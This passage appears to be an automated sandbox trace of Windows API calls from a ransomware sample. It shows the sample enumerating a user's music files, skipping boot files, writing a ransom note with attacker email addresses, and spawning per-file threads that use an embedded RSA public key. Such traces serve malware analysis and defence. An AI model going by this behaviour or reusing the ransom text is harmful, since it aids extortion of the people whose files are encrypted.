lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0116.990] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*" [0116.990] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0116.990] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0116.990] SetErrorMode (uMode=0x1) returned 0x1 [0116.991] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\_HELP_INSTRUCTION.TXT") returned 76 [0116.991] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0116.991] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0116.991] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x530) returned 0x0 [0116.991] RegQueryValueExW (in: hKey=0x530, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbbf30, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cbbf30*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0116.991] RegCloseKey (hKey=0x530) returned 0x0 [0116.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0116.991] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0116.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0116.992] CloseHandle (hObject=0x530) returned 1 [0116.992] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0116.992] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0116.992] lstrcpyW (in: lpString1=0x17b644, lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0116.992] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0116.992] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.992] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.992] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.992] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.992] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.992] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.992] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.992] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.992] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.992] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0116.992] lstrcmpW (lpString1="9Y_m-oVB2IyYX", lpString2="..") returned 1 [0116.992] lstrcmpW (lpString1="9Y_m-oVB2IyYX", lpString2=".") returned 1 [0116.992] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0116.992] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0116.992] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpString2="9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0116.992] SetErrorMode (uMode=0x1) returned 0x1 [0116.992] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0116.993] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0116.993] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0116.993] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*" [0116.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0117.009] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0117.009] lstrcpyW (in: lpString1=0x17a5a4, lpString2="9Y_m-oVB2IyYX" | out: lpString1="9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0117.010] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0117.010] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0117.010] lstrcmpW (lpString1="2zrMBovJou.wav", lpString2="..") returned 1 [0117.010] lstrcmpW (lpString1="2zrMBovJou.wav", lpString2=".") returned 1 [0117.010] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0117.010] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="ntldr") returned 0x0 [0117.010] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="NTLDR") returned 0x0 [0117.010] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="NTDETECT.COM") returned 0x0 [0117.010] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="ntdetect.com") returned 0x0 [0117.010] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0117.010] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0117.010] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0117.010] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.010] lstrcpyW (in: lpString1=0x17addc, lpString2="2zrMBovJou.wav" | out: lpString1="2zrMBovJou.wav") returned="2zrMBovJou.wav" [0117.010] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.010] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x538 [0117.010] Sleep (dwMilliseconds=0x96) [0117.181] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0117.181] lstrcmpW (lpString1="btD83YaGWQR.m4a", lpString2="..") returned 1 [0117.181] lstrcmpW (lpString1="btD83YaGWQR.m4a", lpString2=".") returned 1 [0117.181] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0117.181] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="ntldr") returned 0x0 [0117.181] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="NTLDR") returned 0x0 [0117.181] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0117.181] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="ntdetect.com") returned 0x0 [0117.181] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0117.181] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0117.181] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0117.181] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.181] lstrcpyW (in: lpString1=0x17addc, lpString2="btD83YaGWQR.m4a" | out: lpString1="btD83YaGWQR.m4a") returned="btD83YaGWQR.m4a" [0117.181] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.181] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0117.181] Sleep (dwMilliseconds=0x96) [0117.365] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0117.365] lstrcmpW (lpString1="BtnyH.mp3", lpString2="..") returned 1 [0117.365] lstrcmpW (lpString1="BtnyH.mp3", lpString2=".") returned 1 [0117.365] StrStrW (lpFirst="BtnyH.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0117.365] StrStrW (lpFirst="BtnyH.mp3", lpSrch="ntldr") returned 0x0 [0117.365] StrStrW (lpFirst="BtnyH.mp3", lpSrch="NTLDR") returned 0x0 [0117.365] StrStrW (lpFirst="BtnyH.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0117.365] StrStrW (lpFirst="BtnyH.mp3", lpSrch="ntdetect.com") returned 0x0 [0117.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0117.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0117.365] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0117.365] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.365] lstrcpyW (in: lpString1=0x17addc, lpString2="BtnyH.mp3" | out: lpString1="BtnyH.mp3") returned="BtnyH.mp3" [0117.365] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x544 [0117.365] Sleep (dwMilliseconds=0x96) [0117.520] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0117.520] lstrcmpW (lpString1="bTxozG6jGL89 vQ7JVm.m4a", lpString2="..") returned 1 [0117.520] lstrcmpW (lpString1="bTxozG6jGL89 vQ7JVm.m4a", lpString2=".") returned 1 [0117.520] StrStrW (lpFirst="bTxozG6jGL89 vQ7JVm.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0117.520] StrStrW (lpFirst="bTxozG6jGL89 vQ7JVm.m4a", lpSrch="ntldr") returned 0x0 [0117.520] StrStrW (lpFirst="bTxozG6jGL89 vQ7JVm.m4a", lpSrch="NTLDR") returned 0x0 [0117.520] StrStrW (lpFirst="bTxozG6jGL89 vQ7JVm.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0117.520] StrStrW (lpFirst="bTxozG6jGL89 vQ7JVm.m4a", lpSrch="ntdetect.com") returned 0x0 [0117.520] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0117.520] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0117.520] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0117.520] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.520] lstrcpyW (in: lpString1=0x17addc, lpString2="bTxozG6jGL89 vQ7JVm.m4a" | out: lpString1="bTxozG6jGL89 vQ7JVm.m4a") returned="bTxozG6jGL89 vQ7JVm.m4a" [0117.520] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x548 [0117.521] Sleep (dwMilliseconds=0x96) [0117.676] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0117.676] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0117.676] lstrcmpW (lpString1="dTOAV.wav", lpString2="..") returned 1 [0117.676] lstrcmpW (lpString1="dTOAV.wav", lpString2=".") returned 1 [0117.676] StrStrW (lpFirst="dTOAV.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0117.676] StrStrW (lpFirst="dTOAV.wav", lpSrch="ntldr") returned 0x0 [0117.676] StrStrW (lpFirst="dTOAV.wav", lpSrch="NTLDR") returned 0x0 [0117.676] StrStrW (lpFirst="dTOAV.wav", lpSrch="NTDETECT.COM") returned 0x0 [0117.676] StrStrW (lpFirst="dTOAV.wav", lpSrch="ntdetect.com") returned 0x0 [0117.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0117.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0117.678] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0117.678] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.678] lstrcpyW (in: lpString1=0x17addc, lpString2="dTOAV.wav" | out: lpString1="dTOAV.wav") returned="dTOAV.wav" [0117.678] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 